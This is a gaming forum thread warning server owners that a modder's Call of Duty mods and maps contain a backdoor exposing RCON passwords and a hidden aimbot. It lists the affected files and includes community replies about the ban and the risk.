Community members have recently decompiled modifications and maps created by community scripter, mapper, and modder KiLL3r and discovered a number of security flaws including a backdoor allowing users with access the ability to retrieve the RCON password of any server using the map or mod. Staff at InfinityWard.com (http://www.infinityward.com) have removed links to the mod and passwords, citing the potential security flaws.
WARNING: K3 V1.11 AND POSSIBLY PREVIOUS VERSIONS HAVE BEEN CONFIRMED TO HAVE THE ABILITY TO STEAL YOUR RCON PASSWORD -- THIS MOD ALSO HAS A BUILT-IN AIMBOT

To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.

Server owners and administrators are highly advised to remove all of KiLL3R's mods from their servers until each mod is checked for malicious code and scripting.
Mods:
-K3
-Ion Cannon Mod
-Freeze Tag mod
-iBAS Beta 1.1 Mod
-UO Zombie Mod

Maps:
-Q3CTF3
-WAWA
-Maze1
-Backlot Night
-Rat House


All of these files which were hosted on Total Gaming Files (http://files.totalgamingnetwork.com) have since been removed, and all mirrors are highly encouraged to remove these files.

It doesn't exactly 'steal' the rcon password, it just shows the password only to KiLL3r, but he could easily write down each rcon that runs his mod, and then possibly breach into other servers that are run by same community, since many people use similar rcons for all servers they use... and the 'aimbot' can only be run by the bots, however pb could pickup this 'aimbot' and think you have an installed aimbot and then ban you...

Hence it allows him to retrieve your RCON password. ;)

Yea, trojan horses dont steal anything either, they just email passwords to specific hosts.

The bot stuff doesnt concern me, its the password thing. You dont need something like that. RCON is the key to the kingdom and though he may not have planned on using it, its an exploit waiting for someone else to figure out and manipulate.

Good posting and good job spreading the word.

Crunch

Makes me wonder what other kind of bad stuff is included in theses custom maps, or even worse - mods. Call me paranoid, but I'm no longer allowing downloads and not playing on any servers with mods.

Makes me wonder what other kind of bad stuff is included in theses custom maps, or even worse - mods. Call me paranoid, but I'm no longer allowing downloads and not playing on any servers with mods.

You're paranoid.

Oh god. So this dosent steal our CD key?!?!

And 2 thumbs down to Kill3r. Trying to steal RCON's? Pff. PB should ban him.

PB should ban him.

UMMMM



To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.

Ok ok I get it. What i meant to say is

Good job PB for banning him but it dosnet steal your cd key right?:

It doesn't exactly 'steal' the rcon password, it just shows the password only to KiLL3r, but he could easily write down each rcon that runs his mod, and then possibly breach into other servers that are run by same community, since many people use similar rcons for all servers they use... and the 'aimbot' can only be run by the bots, however pb could pickup this 'aimbot' and think you have an installed aimbot and then ban you...

I could be wrong, but from the posts I saw on other boards, the aimbot is not for the bots, but works for his GUID/username allowing him to use it on servers with his mod.

what a chimp

PB should ban him.

UMMMM



To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.

Thats only if the server streams to PBBans, if it's only Punkbuster then he can still play.

Dan;2052304']Thats only if the server streams to PBBans, if it's only Punkbuster then he can still play.

I stand corrected.

well while it is a bad thing, that is a smart thing im surprised no one thought of that before really.

Good find. Thanks for alerting us.

Probably no one thought of it before because most modders/mapper do not think along those lines. Only the idiots like this guys would think "how can I use my coding knowledge to my own personal gain".

At the end of the day this guy is breaching security on servers, writing hacks. The guy should be banned from all communities (and has been from most I understand).